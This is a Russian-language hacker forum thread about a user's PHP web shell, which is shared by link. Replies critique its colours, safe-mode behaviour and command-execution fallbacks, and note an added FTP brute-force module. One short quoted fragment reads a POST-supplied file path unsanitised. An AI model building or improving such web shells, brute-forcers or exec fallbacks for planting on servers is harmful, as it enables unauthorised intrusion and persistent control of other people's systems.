шелл от меня=)

в общем тут традиция делать шеллы , а я так посмотрел ни разу не сделал =\
естественно онли пост
http://netsec.ru/gb_old/src/shell.phps

 

похож на шелл ак74
а по делу...
что за тёмносерый текст на светлосером фоне???
пощади глаза

 

В окне листинга неплохо бы сделать выравнивание по колонкам вывода .. сейчас просмотр листинга немного затруднен )
алиасы... мм.. да в принципе не вижу смысла искать конфиг.инк.пхп ))) + ты еще и по маске конфиги ищещь..

 

ну вообще то я не ищу
просто добавил из р57 =\
как и шелами я тоже не пользуюсь)
про цвета букв - имхо нормально видно

 

фигово в сейфмоде работает, и в винде вообще

Code:

Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode

 

Так если safe-mode, то

PHP:

max_execution_time(0);

 

молодец! все просто и ясно, без наворотов)

ps напиши еще подробный манул по его заливке)))

 

норм) поюзаем..

да-да, по заливке для каждого форума/цмс, а то че с ним делать

 

Обновил.)

 

Так получше будет.

 

GreenBear, если сейф мод включен, то будет не корректно пахать
Напиши еще так

PHP:

 max_execution_time(0);  

 

Критика

Первое с чем я столкнулся, то что шелл у тебя в UTF-8, а сервер netsec'a отвечает:

Code:

Content-Type: text/html; charset=windows-1251

Code:

[color=#00AA00][color=#00FF00]if[/COLOR][color=#0000FF]([/COLOR]$_POST[color=#0000FF][[/COLOR][/COLOR][color=#FFFF00]'download'[/COLOR][color=#00AA00][color=#0000FF]])[/COLOR][color=#FF0000]{[/COLOR]
    [color=#00FF00]header[/COLOR][color=#0000FF]([/COLOR][/COLOR][color=#FFFF00]'Content-Length:'[/COLOR][color=#00AA00][color=#0000FF].[/COLOR][color=#00FF00]filesize[/COLOR][color=#0000FF]([/COLOR][/COLOR][color=#FFFF00]'[color=#FF0000]/[/COLOR]tmp[color=#FF0000]/[/COLOR]'[/COLOR][color=#00AA00][color=#0000FF].[/COLOR]$_POST[color=#0000FF][[/COLOR][/COLOR][color=#FFFF00]'download'[/COLOR][color=#00AA00][color=#0000FF]].[/COLOR][/COLOR][color=#FFFF00]'.sql'[/COLOR][color=#00AA00][color=#0000FF]).[/COLOR][/COLOR][color=#FFFF00]' '[/COLOR][color=#00AA00][color=#0000FF])[/COLOR][color=#FF0000];[/COLOR]
    [color=#00FF00]header[/COLOR][color=#0000FF]([/COLOR][/COLOR][color=#FFFF00]'Content-Type: application/octet-stream'[/COLOR][color=#00AA00][color=#0000FF])[/COLOR][color=#FF0000];[/COLOR]
    [color=#00FF00]header[/COLOR][color=#0000FF]([/COLOR][/COLOR][color=#FFFF00]"Content-Disposition: attachment; filename={[color=#00AA00]$_POST[/COLOR]['download']}.sql"[/COLOR][color=#00AA00][color=#0000FF])[/COLOR][color=#FF0000];[/COLOR]
    [color=#00FF00]readfile[/COLOR][color=#0000FF]([/COLOR][/COLOR][color=#FFFF00]'[color=#FF0000]/[/COLOR]tmp[color=#FF0000]/[/COLOR]'[/COLOR][color=#00AA00][color=#0000FF].[/COLOR]$_POST[color=#0000FF][[/COLOR][/COLOR][color=#FFFF00]'download'[/COLOR][color=#00AA00][color=#0000FF]].[/COLOR][/COLOR][color=#FFFF00]'.sql'[/COLOR][color=#00AA00][color=#0000FF])[/COLOR][color=#FF0000];[/COLOR]
    [color=#00FF00]die[/COLOR][color=#0000FF]()[/COLOR][color=#FF0000];
}[/COLOR]
$_POST[color=#0000FF][[/COLOR][/COLOR][color=#FFFF00]'dir'[/COLOR][color=#00AA00][color=#0000FF]] ?[/COLOR] $dir [color=#0000FF]=[/COLOR] $_POST[color=#0000FF][[/COLOR][/COLOR][color=#FFFF00]'dir'[/COLOR][color=#00AA00][color=#0000FF]][/COLOR] : $dir [color=#0000FF]=[/COLOR] [color=#00FF00]getcwd[/COLOR][color=#0000FF]()[/COLOR][color=#FF0000];[/COLOR]
[color=#00FF00]if[/COLOR][color=#0000FF]([/COLOR][color=#00FF00]get_magic_quotes_gpc[/COLOR][color=#0000FF]())[/COLOR] [color=#00FF00]foreach[/COLOR][color=#0000FF]([/COLOR]$_POST [color=#00FF00]as[/COLOR] $k[color=#0000FF]=>[/COLOR]$v[color=#0000FF])[/COLOR] $_POST[color=#0000FF][[/COLOR]$k[color=#0000FF]] =[/COLOR] [color=#00FF00]stripslashes[/COLOR][color=#0000FF]([/COLOR]$v[color=#0000FF])[/COLOR][color=#FF0000];[/COLOR][/COLOR]

Как насчёт убрать слэши из переменных до использования последних?

хорошо-бы добавить поддержку использования взаимозаменяемых функций, например в my_exec, кроме popen, добавить system и passthu

ИМХО, яркий действительно глаза напрягает.

Про js, который не нужен я ничего говорить не буду.))

Кстати, не пробовал его проинклудить не первым? Как выглядит?

А вот вопрос, уже давно меня интересует:
Для чего все как один, делают авторизацию по Имени и Паролю, если всё-равно пользователь может быть только 1 ?

 

ты про довнлоад?) а смысл если файл все равно число? да и добавил я уже после )

если чесно то тоже не вижу смысла.

мне так удобнее делать =\

автоматом.

 

Нет, чтоб не получались вот такие пути "C:\\\\\\\\www\\\\\\\\http\\\\\\\\"

Просто некоторые функции бывают отключены, а про другие забывают.

 

ну где выключен попен, там и все другие типа систем, ексек тоже =\ в основном. добавить не сложно конечно, но смысла не вижу)

 

Обновление.
Добавлен фтп брут
качать там же

 

ОШИБКА
Запрошенный Url не может быть доставлен

Это только у меня так?

 

нет, сайт не доступен Гринбира...

 

http://netsec.ru/gb_old/src/shell.phps

 

спасибо молодец, пользуюсь ак57, но твой тоже придёться затестить )))

+

меня почему-то постоянно куда ненажимаю бросает на страничку с логином и пассом .Набираю test и всё ровно.
Тест провожу на винде
И на хосте под линухой такая же ботва.Хост на агаве